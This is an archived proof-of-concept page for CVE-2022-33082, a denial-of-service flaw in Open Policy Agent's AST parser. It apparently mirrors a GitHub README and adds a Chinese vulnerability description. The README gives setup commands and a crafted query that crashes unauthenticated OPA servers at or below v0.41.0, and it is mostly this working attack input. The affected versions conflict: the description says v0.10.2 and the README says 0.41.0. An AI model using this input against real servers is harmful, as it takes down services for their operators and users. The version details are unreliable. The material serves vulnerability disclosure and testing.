CVE-2022-33082 PoC — Open Policy Agent 安全漏洞

Source

https://github.com/cyberqueenmeg/cve-2022-33082-exploit

Associated Vulnerability

Title:Open Policy Agent 安全漏洞 (CVE-2022-33082)
Description:Open Policy Agent是一个开源的通用策略引擎，可在整个堆栈中实现统一的、上下文感知的策略实施。 Open Policy Agent v0.10.2存在安全漏洞，该漏洞源于AST 解析器 (ast/compile.go) 中的一个问题允许攻击者通过精心设计的输入导致拒绝服务 (DoS)。

Readme

# CVE 2022-33082 Exploit

## DISCLAMER
### This code is provided for **ETHICAL** purposes - understanding the vulnerability and testing one's own systems or AUTHORIZED systems. By using this, you agree to act ethically and I hold no liability if you do not act ethically.

### This exploit works on Open Policy Agent (OPA) versions 0.41.0 and lower. Install an OPA instance on Linux to test with this command:
`
curl -L -o opa https://openpolicyagent.org/downloads/v0.41.0/opa_linux_amd64_static
`

`
chmod +x opa
`

`
./opa run --server
`

### Then, navigate to localhost:8181 on your web browser. Input the below into the respective fields

query field (go code):
`
p := [input() | input := 1]
`

`
{ "input":"put this in the input (json) field!" }
`
### The website will then crash and the terminal runing the server will report a kernel panic

## Implications
### Anyone with web access to an OPA server version 0.41.0 or lower can completely crash the server. This server is not password protected by default.

File Snapshot


 [4.0K]  /data/pocs/34848287f59b727c4e12b4dc0f54405292fcdf5c
└── [1015]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!